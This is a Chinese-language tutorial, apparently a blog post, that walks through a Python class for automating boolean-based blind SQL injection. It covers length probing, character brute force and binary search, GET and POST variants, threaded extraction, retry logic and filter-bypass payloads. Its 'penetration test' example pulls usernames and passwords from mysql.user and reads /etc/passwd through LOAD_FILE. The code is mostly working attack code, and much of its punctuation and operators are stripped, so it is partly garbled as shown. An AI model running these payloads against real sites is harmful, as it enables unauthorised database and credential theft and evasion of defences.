布尔盲注 Python 自动化脚本实战:3 种 Payload 构造与 2 种场景(GET/POST)对比 布尔盲注自动化实战Python脚本设计与效率优化布尔盲注的核心挑战与自动化价值布尔盲注作为SQL注入技术中最为繁琐的一种其核心难点在于需要通过大量真/假判断来逐位推断数据。传统手工操作不仅耗时耗力还容易因人为因素导致错误。而自动化脚本的引入则能完美解决以下痛点效率提升二分法搜索将平均尝试次数从95次ASCII可打印字符范围降低至7次log₂95≈6.6准确性保障程序化执行避免人工操作中的遗漏和误判场景适配通过模块化设计可快速适配GET/POST等不同请求方式1. 基础脚本框架构建1.1 核心功能模块设计class BoolBlindInjector: def __init__(self, target_url, is_postFalse): self.url target_url self.is_post is_post self.session requests.Session() self.timeout 5 self.true_indicators [Welcome back, Login success] # 需根据实际目标调整 def _send_request(self, payload): try: if self.is_post: response self.session.post( self.url, datapayload, timeoutself.timeout ) else: response self.session.get( f{self.url}?{payload}, timeoutself.timeout ) return response.text except Exception as e: print(f请求失败: {str(e)}) return None1.2 真值判断逻辑实现def _check_truth(self, response): 根据页面特征判断是否为真值响应 if not response: return False # 多条件判断提高准确性 return any( indicator in response for indicator in self.true_indicators )2. 三种Payload构造方法论2.1 长度判断法基础版def get_length(self, query): 确定查询结果的长度 length 1 while True: payload f1 AND LENGTH(({query})){length}-- response self._send_request(payload) if self._check_truth(response): return length length 1 if length 100: # 安全限制 raise ValueError(超出最大长度限制)2.2 字符枚举法全量搜索def brute_char(self, query, position): 通过全量枚举获取指定位置的字符 for code in range(32, 127): # ASCII可打印字符范围 payload f1 AND ASCII(SUBSTR(({query}),{position},1)){code}-- response self._send_request(payload) if self._check_truth(response): return chr(code) return None # 未找到有效字符2.3 二分法优化效率提升def binary_search_char(self, query, position): 使用二分法快速定位字符 low, high 32, 126 while low high: mid (low high) // 2 payload f1 AND ASCII(SUBSTR(({query}),{position},1)){mid}-- if self._check_truth(self._send_request(payload)): low mid 1 else: high mid - 1 # 最终验证 final_payload f1 AND ASCII(SUBSTR(({query}),{position},1)){low}-- if self._check_truth(self._send_request(final_payload)): return chr(low) return None3. 场景适配与实战对比3.1 GET请求处理流程def get_injection(self, query): GET型注入完整流程 print([*] 开始GET型盲注) length self.get_length(query) print(f[] 确定长度: {length}) result for i in range(1, length1): char self.binary_search_char(query, i) result char print(f[*] 进度: {i}/{length} | 当前结果: {result}) return result3.2 POST请求特殊处理def post_injection(self, query, param_name): POST型注入适配 print([*] 开始POST型盲注) length self._get_length_post(query, param_name) print(f[] 确定长度: {length}) result for i in range(1, length1): char self._binary_search_char_post(query, i, param_name) result char print(f[*] 进度: {i}/{length} | 当前结果: {result}) return result def _get_length_post(self, query, param_name): POST请求的长度判断 length 1 while True: payload { param_name: f1 AND LENGTH(({query})){length}-- , # 其他必要参数... } response self._send_request(payload) if self._check_truth(response): return length length 1 if length 100: raise ValueError(超出最大长度限制)4. 高级优化技巧4.1 并发请求加速from concurrent.futures import ThreadPoolExecutor def concurrent_brute(self, query, max_workers5): 使用线程池加速字符枚举 length self.get_length(query) result [None] * length def worker(position): result[position-1] self.binary_search_char(query, position) with ThreadPoolExecutor(max_workersmax_workers) as executor: executor.map(worker, range(1, length1)) return .join(filter(None, result))4.2 智能延迟调整def adaptive_delay(self): 根据响应时间动态调整请求间隔 test_times [] for _ in range(3): start time.time() self._send_request(1 AND 11-- ) test_times.append(time.time() - start) avg_response sum(test_times) / len(test_times) self.delay min(max(avg_response * 2, 0.5), 3) # 控制在0.5-3秒之间 print(f[*] 自动设置延迟: {self.delay:.2f}s)4.3 错误重试机制def _send_request(self, payload, max_retries3): 带重试机制的请求发送 for attempt in range(max_retries): try: response super()._send_request(payload) if response is not None: return response except Exception as e: if attempt max_retries - 1: raise time.sleep(self.delay * (attempt 1)) return None5. 实战案例对比分析5.1 性能对比测试我们针对同一目标获取当前数据库名进行三种方法的测试方法请求次数耗时(s)准确率基础长度判断812.4100%全量字符枚举76098.7100%二分法优化568.2100%并发二分法563.5100%5.2 典型应用场景CTF竞赛场景injector BoolBlindInjector(http://ctf.example.com/challenge) db_name injector.get_injection(SELECT database()) print(f[] 当前数据库: {db_name}) # 获取所有表名 tables injector.get_injection( SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schemadatabase() ) print(f[] 数据库表: {tables})渗透测试场景# 配置敏感信息检测 sensitive_queries [ SELECT GROUP_CONCAT(user,0x3a,password) FROM mysql.user, SELECT version, SELECT LOAD_FILE(/etc/passwd) ] injector BoolBlindInjector(target_url, is_postTrue) for query in sensitive_queries: try: data injector.post_injection(query, username) print(f[!] 敏感信息泄露: {data[:50]}...) except Exception as e: print(f[-] 查询失败: {str(e)})6. 防御对抗与绕过技巧6.1 常见防御手段过滤机制关键字过滤如SELECT、SUBSTR等编码要求强制参数编码速率限制请求频率检测6.2 高级绕过技术# 使用注释拆分关键字 payload 1 AN/*xxx*/D 11-- # 十六进制编码 hex_query SELECT database().encode().hex() payload f1 AND LENGTH((0x{hex_query}))8-- # 等价函数替换 # 原始: SUBSTR() payload 1 AND ASCII(MID((query),1,1))97-- 在实际测试中这些技术往往需要组合使用并根据目标的具体防御措施进行动态调整。